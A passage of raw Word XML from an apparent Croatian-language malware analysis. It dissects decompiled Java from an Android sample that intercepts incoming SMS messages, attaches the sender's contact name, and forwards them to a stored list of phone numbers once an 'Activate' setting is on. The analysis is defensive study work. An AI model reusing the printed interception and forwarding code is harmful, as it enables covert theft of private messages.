        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if(stringbuffer.length() &lt;= 160)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                        break label0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    for(; stringtokenizer.hasMoreTokens(); smsmanager.sendTextMessage(stringtokenizer.nextToken(), null, stringbuffer.substring(0, 0 + 160), null, null))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">                        break label1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    0 + 160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRPr="0086242F" w:rsidRDefault="00302246" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302246" w:rsidRDefault="00302246" w:rsidP="00BC156B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U ovom odsječku se vidi da se drugi dio uvjeta poziva poziva samo ako atribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DBactivate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> sadrži vrijednost „Activate”, a u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> odsječku se saznaje </w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">da se </w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DBactivate</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> inicijalizira na isti način kao prethodno traženo varijabla </w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, no s drugim argumentom – „</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>activate</w:t>
      </w:r>
      <w:r w:rsidR="0049505E">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>”. Ponovnim pregledom d</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">ijela koda u razredu </w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ustvrdi se da se varijabla početno inicijalizirana na vrijednost „</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Activate</w:t>
      </w:r>
      <w:r w:rsidR="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC156B" w:rsidRDefault="00BC156B" w:rsidP="00BC156B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>sqlitedatabase.execSQL("INSERT INTO settings (phone_no, activate, ui_pass) VALUES( '0000', '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC156B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Activate</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC156B">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>', '000');");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC156B" w:rsidRDefault="00BC156B" w:rsidP="00BC156B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC156B" w:rsidRDefault="00BC156B" w:rsidP="004908B7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Dakle, uvjet je ispunjen. U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>if else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> dijelu se </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">inicijalizira varijabla </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>smsmanager</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja je tipa </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SmsManager</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, odnosno razreda koji upravlja SMS operacijama kao što je slanje podatkovnih, tekstualnih i pdu SMS poruka. </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Stringtokenizer</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> je tipa </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>StringTokenizer</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koji „razbija” riječ u odnosu na određeni delimiter, u ovom slučaju znak ‘,’. Varijabla </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>stringbuffer</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> je tipa </w:t>
      </w:r>
      <w:r w:rsidR="004908B7" w:rsidRPr="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, apstrakcije za slijed znakova te se u nju sprema varijabla </w:t>
      </w:r>
      <w:r w:rsidR="004908B7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidR="009864AF">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja se dobiva na sljedeći način:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>_L4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>smsmessage = SmsMessage.createFromPdu((byte[])aobj[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        uri = Uri.withAppendedPath(android.provider.ContactsContract.PhoneLookup.CONTENT_FILTER_URI, Uri.encode(smsmessage.getDisplayOriginatingAddress().toString()));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        as = new String[1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        as[0] = "display_name";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        cursor = contentresolver.query(uri, as, null, null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        cursor.moveToFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println((new StringBuilder("++++++++++++")).append(cursor.getString(0)).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(s != null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            break MISSING_BLOCK_LABEL_420;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s1 = (new StringBuilder("From:")).append(cursor.getString(0)).append(":").toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">        s = s1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>_L6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msg = (new StringBuilder(String.valueOf(msg))).append(smsmessage.getMessageBody().toString()).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        indexoutofboundsexception;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(s == null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">            s = (new StringBuilder("From:")).append(smsmessage.getDisplayOriginatingAddress().toString()).append(":").toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        for(; stringtokenizer.hasMoreTokens(); smsmanager.sendTextMessage(stringtokenizer.nextToken(), null, stringbuffer.toString(), null, null));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="00D5261B" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="0086242F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>te:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRPr="0086242F" w:rsidRDefault="004A7A96" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>str = (new StringBuilder(String.valueOf(s))).append(msg).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00255C85" w:rsidRDefault="004A7A96" w:rsidP="00DE5302">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Kad se došlo do svih potrebnih informacija o inicijalizaciji, vrijednosti i značenju varijabla, može se objasniti što prethodni </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>if else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> odsječak uistinu radi. U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>if else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> odsječku se dobiju brojevi pošiljatelju u obliku Stringa. Zatim se provjerava je li niz znakova manji od 160 znakova u slučaju čega se kod prekida, a na kraju odsječka je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> petlja koja, dok god ima varijabla </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>stringtokenizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> sadrži tokene, odnosno brojeve telefona na koje se prosljeđuje primljena </w:t>
      </w:r>
      <w:r w:rsidR="00255C85">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">SMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>poruka, šalje t</w:t>
      </w:r>
      <w:r w:rsidR="00255C85">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> por</w:t>
      </w:r>
      <w:r w:rsidR="00255C85">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>uku na određeni broj telefona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00255C85" w:rsidRDefault="00255C85" w:rsidP="00255C85">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00255C85" w:rsidRDefault="00255C85" w:rsidP="00255C85">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRDefault="00255C85" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc406756509"/>
      <w:bookmarkStart w:id="76" w:name="_Toc406756622"/>
      <w:r>
